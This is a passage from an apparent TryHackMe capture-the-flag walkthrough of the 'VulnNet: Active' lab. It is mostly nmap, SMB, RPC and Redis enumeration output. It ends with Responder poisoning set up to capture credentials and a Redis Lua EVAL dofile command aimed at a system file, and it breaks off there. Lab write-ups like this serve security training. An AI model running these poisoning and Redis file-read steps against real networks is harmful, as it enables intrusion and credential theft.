TryHackMe Vulnnet: Active
Requirements
enum4linux-ng
redis
haiti
john
smbmap
crackmapexec
metasploit
powersploit
smbclient
nullinux
villain
nmap
nmap -sV -p- -Pn 10.10.22.71
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 20:39 EST
Nmap scan report for 10.10.22.71
Host is up (0.086s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
6379/tcp open redis Redis key-value store 2.8.2402
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.02 seconds
enum4linux (smb enumeration)
enum4linux-ng -A 10.10.22.71
ENUM4LINUX - next generation (v1.3.2)
==========================
| Target Information |
==========================
[*] Target ........... 10.10.22.71
[*] Username ......... ''
[*] Random Username .. 'emrlcivn'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
====================================
| Listener Scan on 10.10.22.71 |
====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================================
| NetBIOS Names and Workgroup/Domain for 10.10.22.71 |
==========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
========================================
| SMB Dialect Check on 10.10.22.71 |
========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
==========================================================
| Domain Information via SMB session for 10.10.22.71 |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: VULNNET-BC3TCK1
NetBIOS domain name: VULNNET
DNS domain: vulnnet.local
FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local
Derived membership: domain member
Derived domain: VULNNET
========================================
| RPC Session Check on 10.10.22.71 |
========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
==================================================
| Domain Information via RPC for 10.10.22.71 |
==================================================
[+] Domain: VULNNET
[+] Domain SID: S-1-5-21-1405206085-1650434706-76331420
[+] Membership: domain member
==============================================
| OS Information via RPC for 10.10.22.71 |
==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
====================================
| Users via RPC on 10.10.22.71 |
====================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=====================================
| Groups via RPC on 10.10.22.71 |
=====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=====================================
| Shares via RPC on 10.10.22.71 |
=====================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
========================================
| Policies via RPC for 10.10.22.71 |
========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
========================================
| Printers via RPC for 10.10.22.71 |
========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 31.42 seconds
impacket-rpcdump
Protocol: N/A
Provider: dhcpcsvc.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc]
ncalrpc:[dhcpcsvc6]
ncacn_ip_tcp:10.10.22.71[49666]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: dhcpcsvc6.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc6]
ncacn_ip_tcp:10.10.22.71[49666]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: [MS-EVEN6]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings:
ncacn_ip_tcp:10.10.22.71[49666]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: N/A
UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0
Bindings:
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: nrpsrv.dll
UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings:
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: N/A
UUID : A4B8D482-80CE-40D6-934D-B22A01A44FE7 v1.0 LicenseManager
Bindings:
ncalrpc:[LicenseServiceEndpoint]
Protocol: N/A
Provider: nsisvc.dll
UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings:
ncalrpc:[LRPC-061754b666383f2114]
Protocol: N/A
Provider: N/A
UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: iphlpsvc.dll
UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings:
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : 29770A8F-829B-4158-90A2-78CD488501F7 v1.0
Bindings:
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: [MS-CMPO]: MSDTC Connection Manager:
Provider: msdtcprx.dll
UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0
Bindings:
ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
Protocol: N/A
Provider: N/A
UUID : 4C9DBF19-D39E-4BB9-90EE-8F7179B20283 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : FD8BE72B-A9CD-4B2C-A9CA-4DED242FBE4D v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : 95095EC8-32EA-4EB0-A3E2-041F97B36168 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : E38F5360-8572-473E-B696-1B46873BEEAB v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : D22895EF-AFF4-42C5-A5B2-B14466D34AB4 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : 98CD761E-E77D-41C8-A3C0-0FB756D90EC2 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: [MS-FRS2]: Distributed File System Replication Protocol
Provider: dfsrmig.exe
UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings:
ncalrpc:[OLEF2A96DE6D564C95BCA50BFBAE58E]
ncacn_ip_tcp:10.10.22.71[49720]
Protocol: N/A
Provider: N/A
UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0
Bindings:
ncalrpc:[LRPC-2656bdde0795bfccbd]
Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management
Provider: dns.exe
UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0
Bindings:
ncacn_ip_tcp:10.10.22.71[49696]
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
ncacn_ip_tcp:10.10.22.71[49694]
Protocol: N/A
Provider: sppsvc.exe
UUID : 9435CC56-1D9C-4924-AC7D-B60A2C3520E1 v1.0 SPPSVC Default RPC Interface
Bindings:
ncalrpc:[SPPCTransportEndpoint-00001]
Protocol: N/A
Provider: N/A
UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server
Bindings:
ncalrpc:[LRPC-4e8e9db7c66657829c]
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol
Provider: spoolsv.exe
UUID : 0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol
Provider: spoolsv.exe
UUID : AE33069B-A2A8-46EE-A235-DDFD339BE281 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: N/A
Provider: spoolsv.exe
UUID : 4A452661-8290-4B36-8FBE-7F4093A94978 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: N/A
Provider: srvsvc.dll
UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings:
ncalrpc:[LRPC-20e00a11ef5c9a4cb8]
Protocol: N/A
Provider: N/A
UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings:
ncalrpc:[LRPC-20e00a11ef5c9a4cb8]
Protocol: N/A
Provider: BFE.DLL
UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
Protocol: N/A
Provider: MPSSVC.dll
UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
ncalrpc:[LRPC-0452539d4b61802f71]
Protocol: N/A
Provider: N/A
UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
ncalrpc:[LRPC-0452539d4b61802f71]
ncalrpc:[LRPC-4bbd50221c73d874bb]
Protocol: N/A
Provider: MPSSVC.dll
UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
ncalrpc:[LRPC-0452539d4b61802f71]
ncalrpc:[LRPC-4bbd50221c73d874bb]
ncalrpc:[LRPC-d730bac2ce4fb8e128]
Protocol: N/A
Provider: N/A
UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server
Bindings:
ncalrpc:[DNSResolver]
ncalrpc:[nlaplg]
ncalrpc:[nlaapi]
Protocol: N/A
Provider: N/A
UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface
Bindings:
ncalrpc:[DNSResolver]
ncalrpc:[nlaplg]
ncalrpc:[nlaapi]
Protocol: N/A
Provider: N/A
UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings:
ncalrpc:[DNSResolver]
ncalrpc:[nlaplg]
ncalrpc:[nlaapi]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\wkssvc]
Protocol: N/A
Provider: certprop.dll
UUID : 30B044A5-A225-43F0-B3A4-E060DF91F9C1 v1.0
Bindings:
ncalrpc:[LRPC-deb93f84a023ce791c]
Protocol: N/A
Provider: gpsvc.dll
UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface
Bindings:
ncalrpc:[LRPC-ca164f4be6783b3691]
Protocol: N/A
Provider: schedsvc.dll
UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
Protocol: N/A
Provider: N/A
UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[ubpmtaskhostchannel]
ncalrpc:[LRPC-ad7a31532f4c443127]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[ubpmtaskhostchannel]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncacn_ip_tcp:10.10.22.71[49667]
Protocol: N/A
Provider: N/A
UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[ubpmtaskhostchannel]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncacn_ip_tcp:10.10.22.71[49667]
[*] Received 621 endpoints.
redis enumeration
redis-cli -h 10.10.22.71
10.10.22.71:6379> INFO
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:2592
run_id:4c9e17ea384739b0ed8265045c91514c774746c4
tcp_port:6379
uptime_in_seconds:2488
uptime_in_days:0
hz:10
lru_clock:12858312
config_file:
# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:970376
used_memory_human:947.63K
used_memory_rss:936832
used_memory_peak:994688
used_memory_peak_human:971.38K
used_memory_lua:36864
mem_fragmentation_ratio:0.97
mem_allocator:dlmalloc-2.8
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1707354640
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:3
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.94
used_cpu_user:1.23
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Keyspace
10.10.22.71:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "unixsocket"
8) ""
9) "logfile"
10) ""
11) "pidfile"
12) "/var/run/redis.pid"
13) "maxmemory"
14) "0"
15) "maxmemory-samples"
16) "3"
17) "timeout"
18) "0"
19) "tcp-keepalive"
20) "0"
21) "auto-aof-rewrite-percentage"
22) "100"
23) "auto-aof-rewrite-min-size"
24) "67108864"
25) "hash-max-ziplist-entries"
26) "512"
27) "hash-max-ziplist-value"
28) "64"
29) "list-max-ziplist-entries"
30) "512"
31) "list-max-ziplist-value"
32) "64"
33) "set-max-intset-entries"
34) "512"
35) "zset-max-ziplist-entries"
36) "128"
37) "zset-max-ziplist-value"
38) "64"
39) "hll-sparse-max-bytes"
40) "3000"
41) "lua-time-limit"
42) "5000"
43) "slowlog-log-slower-than"
44) "10000"
45) "latency-monitor-threshold"
46) "0"
47) "slowlog-max-len"
48) "128"
49) "port"
50) "6379"
51) "tcp-backlog"
52) "511"
53) "databases"
54) "16"
55) "repl-ping-slave-period"
56) "10"
57) "repl-timeout"
58) "60"
59) "repl-backlog-size"
60) "1048576"
61) "repl-backlog-ttl"
62) "3600"
63) "maxclients"
64) "10000"
65) "watchdog-period"
66) "0"
67) "slave-priority"
68) "100"
69) "min-slaves-to-write"
70) "0"
71) "min-slaves-max-lag"
72) "10"
73) "hz"
74) "10"
75) "repl-diskless-sync-delay"
76) "5"
77) "no-appendfsync-on-rewrite"
78) "no"
79) "slave-serve-stale-data"
80) "yes"
81) "slave-read-only"
82) "yes"
83) "stop-writes-on-bgsave-error"
84) "yes"
85) "daemonize"
86) "no"
87) "rdbcompression"
88) "yes"
89) "rdbchecksum"
90) "yes"
91) "activerehashing"
92) "yes"
93) "repl-disable-tcp-nodelay"
94) "no"
95) "repl-diskless-sync"
96) "no"
97) "aof-rewrite-incremental-fsync"
98) "yes"
99) "aof-load-truncated"
100) "yes"
101) "appendonly"
102) "no"
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
105) "maxmemory-policy"
106) "volatile-lru"
107) "appendfsync"
108) "everysec"
109) "save"
110) "jd 3600 jd 300 jd 60"
111) "loglevel"
112) "notice"
113) "client-output-buffer-limit"
114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
115) "unixsocketperm"
116) "0"
117) "slaveof"
118) ""
119) "notify-keyspace-events"
120) ""
121) "bind"
122) ""
Redis version 2.8.2402 username is enterprise-security
responder (run this in another tab)
sudo responder -I tun0 -dvw
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.191.227]
Responder IPv6 [fe80::7589:1b62:606e:6c09]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-ALXRPOCIKFA]
Responder Domain Name [XKFP.LOCAL]
Responder DCE-RPC Port [48193]
[+] Listening for events...
redis exploitation
10.10.22.71:6379> EVAL "dofile('C:/Windows/System32/drivers/etc/Hosts')" 0
